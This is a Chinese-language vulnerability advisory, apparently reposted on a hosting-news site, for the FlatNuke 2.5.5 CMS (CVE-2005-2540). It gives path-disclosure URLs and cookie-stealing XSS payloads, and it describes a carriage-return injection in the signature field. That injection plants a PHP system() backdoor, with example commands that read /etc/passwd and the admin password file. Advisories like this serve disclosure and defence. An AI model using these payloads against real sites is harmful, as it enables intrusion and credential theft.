FlatNuke用户数据任意PHP代码执行漏洞
2008-04-09 04:15:08来源:互联网 阅读 ()
发布日期:2005-08-08
更新日期:2005-08-08
受影响系统:
FlatNuke FlatNuke 2.5.5描述:
BUGTRAQ ID: 14485
CVE(CAN) ID: CVE-2005-2540
FlatNuke是一款内容管理系统。
FlatNuke 2.5.5中存在远程命令执行/跨站脚本/路径泄漏漏洞:
1 路径泄漏:
http://[target]/[path]/themes/butterfly/structure.php
向mod参数提供空字节:
http://[target]/[path]/index.php?mod=/\0/Vecchi_sondaggi
向mod参数提供保留设备名:
http://[target]/[path]/index.php?mod=prn
http://[target]/[path]/index.php?mod=nul
http://[target]/[path]/index.php?mod=aux
2 跨站脚本:
http://[target]/[path]/themes/butterfly/structure.php?bodycolor="><script>alert(document.cookie)</script> http://[target]/[path]/themes/butterfly/structure.php?backimage="><script>alert(document.cookie)</script>
http://[target]/[path]/themes/butterfly/structure.php?backimage=whatever&theme="><script>alert(document.cookie)</script>
http://[target]/[path]/themes/butterfly/structure.php?backimage=whatever&bodycolor="><script>alert(document.cookie)</script>
http://[target]/[path]/themes/butterfly/structure.php?logo="><script>alert(document.cookie)</script>
3 如果关闭了php.ini中的register_globals,则存在跨站脚本:
http://[target]/[path]/forum/footer.php?admin="><script>alert(document.cookie)</script> http://[target]/[path]/forum/footer.php?admin_mail="><script>alert(document.cookie)</script>
http://[target]/[path]/forum/footer.php?back="><script>alert(document.cookie)</script> http://[target]/[path]/footer.php?admin="><script>alert(document.cookie)</script>
http://[target]/[path]/footer.php?admin_mail="><script>alert(document.cookie)</script>
4 用户可以向管理员发送新闻,并在消息体中注入恶意的javascript代码。如果管理员打开了发送的新闻的话就会运行javascript:
<script>alert(document.cookie)</script>
5 远程代码执行:
在用户注册时,flatnuke在/forum/users目录中以如下方式创建username.php文件:
<?
#b0d7282f4b6f1e09f69c42f148055b5a
#jimihendrix
#jimihendrix@email.com
#http://www.asite.com
#artist
#whereimfrom
#images/clanbomber.png
#signature
#0
?>
如果调用了这个文件,则不会执行任何程序,用#字符标注行。
但在注册时可以向记录中注入ASCII char(13),因此如果将其放置在签名中,就会得到:
<?
#b0d7282f4b6f1e09f69c42f148055b5a
#jimihendrix
#jimihendrix@email.com
#http://www.asite.com
#artist
#whereimfrom
#images/clanbomber.png
#
signature
#0
?>
现在如果signature是个如下的php指令:
system($HTTP_GET_VARS[command]);
就可以在目标系统上安装后门并执行命令:
列出目录
http://[target]/[path_to_flatnuke]/forum/users/[username].php?command=ls -la
查看/etc/passwd文件
http://[target]/[path_to_flatnuke]/forum/users/[username].php?command=cat /etc/passwd
查看管理员口令MD5哈希
http://[target]/[path_to_flatnuke]/forum/users/[username].php?command=cat admin.php
<*来源:rgod (rgod@autistici.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112327238030127&w=2
*>
建议:
厂商补丁:
FlatNuke
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://flatnuke.sourceforge.net/
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash